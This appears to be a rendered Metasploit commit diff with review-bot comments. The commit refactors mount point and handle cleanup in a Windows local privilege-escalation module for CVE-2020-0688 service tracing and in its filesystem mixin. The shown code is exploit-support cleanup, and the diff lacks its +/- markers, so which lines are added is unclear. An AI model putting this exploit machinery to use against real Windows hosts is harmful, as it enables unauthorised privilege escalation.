Land #13897, Fix dangling reference issue in cve_2020_0688_service_tracing.rb
and filesystem.rb Merge branch 'land-13897' into upstream-master
commit
ba7f1ea486
|
@ -185,7 +185,10 @@ module Msf
|
|||
|
||||
unless result['return']
|
||||
print_error("Error deleting the reparse point. Windows Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
|
||||
return -1
|
||||
end
|
||||
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
result['return']
|
||||
end
|
||||
|
||||
|
@ -209,14 +212,10 @@ module Msf
|
|||
handle
|
||||
end
|
||||
|
||||
def delete_mount_point(path)
|
||||
buffer = ReparseGuidDataBuffer.new
|
||||
buffer.reparse_tag = IO_REPARSE_TAG_MOUNT_POINT
|
||||
|
||||
handle = open_reparse_point(path, true)
|
||||
def delete_mount_point(path, handle)
|
||||
return nil unless handle
|
||||
|
||||
delete_reparse_point(handle, buffer.to_binary_s)
|
||||
session.fs.dir.rmdir(path) # Might need some more logic here.
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
end
|
||||
|
||||
def write_to_memory(process, str)
|
||||
|
@ -327,6 +326,7 @@ module Msf
|
|||
return nil unless handle
|
||||
|
||||
set_reparse_point(handle, reparse_data.to_binary_s)
|
||||
handle
|
||||
end
|
||||
end # FileSystem
|
||||
end # Windows
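Review bot: The failure path in the first hunk returns before the handle is released: `return -1` inside `unless result['return']` exits ahead of `session.railgun.kernel32.CloseHandle(handle)`, and `-1` is truthy in Ruby, so a caller testing the result cannot tell a failed delete from a successful one. As rendered, `delete_mount_point(path, handle)` also calls `CloseHandle(handle)` after `delete_reparse_point(handle, buffer.to_binary_s)`, so if both calls are on the new side the same handle is closed twice on success; the page has lost its +/- markers, so this needs checking against the real diff. I would give the close a single owner: drop it from the helper, use `return false` on failure, and keep `session.railgun.kernel32.CloseHandle(handle)` in `delete_mount_point` under an `ensure`. The signature change from `delete_mount_point(path)` to `delete_mount_point(path, handle)` also breaks any other user of this mixin that still passes one argument. The method in the first hunk starts outside the hunk.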
|
||||
|
|
|
@ -80,7 +80,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
OptString.new('PHONEBOOK_UPLOAD_NAME',
|
||||
[false, 'The name of the phonebook file to trigger RASDIAL (%RAND% by default).', nil])
|
||||
])
|
||||
# stores open handles to cleanup properly
|
||||
end
|
||||
|
||||
def write_reg_value(registry_hash)
|
||||
|
@ -148,18 +147,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
end
|
||||
|
||||
def cleanup_mountpoint(dir)
|
||||
print_status("Delete mountpoint #{dir}")
|
||||
unless delete_mount_point(dir)
|
||||
print_error('Error when deleting the mount point.')
|
||||
end
|
||||
begin
|
||||
session.fs.dir.rmdir(dir)
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
print_error("Error when deleting \"#{dir}\".")
|
||||
end
|
||||
end
|
||||
|
||||
def setup_process
|
||||
begin
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
|
@ -202,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def rastapi_privileged_filecopy(file_contents, exploit_dir, upload_payload_pathname, target_payload_pathname)
|
||||
handles = []
|
||||
handles = [] # stores open handles to cleanup properly
|
||||
reg_hash = create_reg_hash(file_contents.length - 1, exploit_dir)
|
||||
vprint_status("Registry hash = #{reg_hash}")
|
||||
|
||||
|
@ -215,7 +202,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# Create mountpoint
|
||||
print_status('Creating mountpoint')
|
||||
unless create_mount_point(exploit_dir, mount_dir)
|
||||
mount_point_handle = create_mount_point(exploit_dir, mount_dir)
|
||||
unless mount_point_handle
|
||||
fail_with(Failure::Unknown, 'Error when creating the mount point... aborting.')
|
||||
end
|
||||
|
||||
|
@ -270,7 +258,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status("Closing symlink handle #{handle}: #{result['ErrorMessage']}")
|
||||
end
|
||||
print_status('Removing Mountpoint')
|
||||
session.fs.dir.rmdir(exploit_dir)
|
||||
delete_mount_point(exploit_dir, mount_point_handle)
|
||||
print_status('Removing directories')
|
||||
unless moved_md5 == upload_md5
|
||||
fail_with(Failure::Unknown, 'Payload hashes do not match; filecopy failed.')
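Review bot: `delete_mount_point(exploit_dir, mount_point_handle)` in the last hunk is unguarded: the library method calls `session.fs.dir.rmdir(path)` with no rescue, whereas the removed `cleanup_mountpoint` rescued `Rex::Post::Meterpreter::RequestError` and reported it. An exception here would skip the 'Removing directories' step that follows and leave artifacts on the host with no message saying what remains. The call also sits only on the straight-line path, so any `fail_with` raised between creating the mount point and this line (that code is outside the hunks shown) would presumably leave the junction in place and its handle open; an `ensure` around the body would cover that. A minimal guard for the call is sketched below; the enclosing method starts and ends outside the hunk.

```ruby
print_status('Removing Mountpoint')
begin
  delete_mount_point(exploit_dir, mount_point_handle)
rescue Rex::Post::Meterpreter::RequestError => e
  print_error("Error when deleting the mount point #{exploit_dir}: #{e.message}")
end
# … unchanged: 'Removing directories' and the payload hash comparison …
```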
|
||||
|
|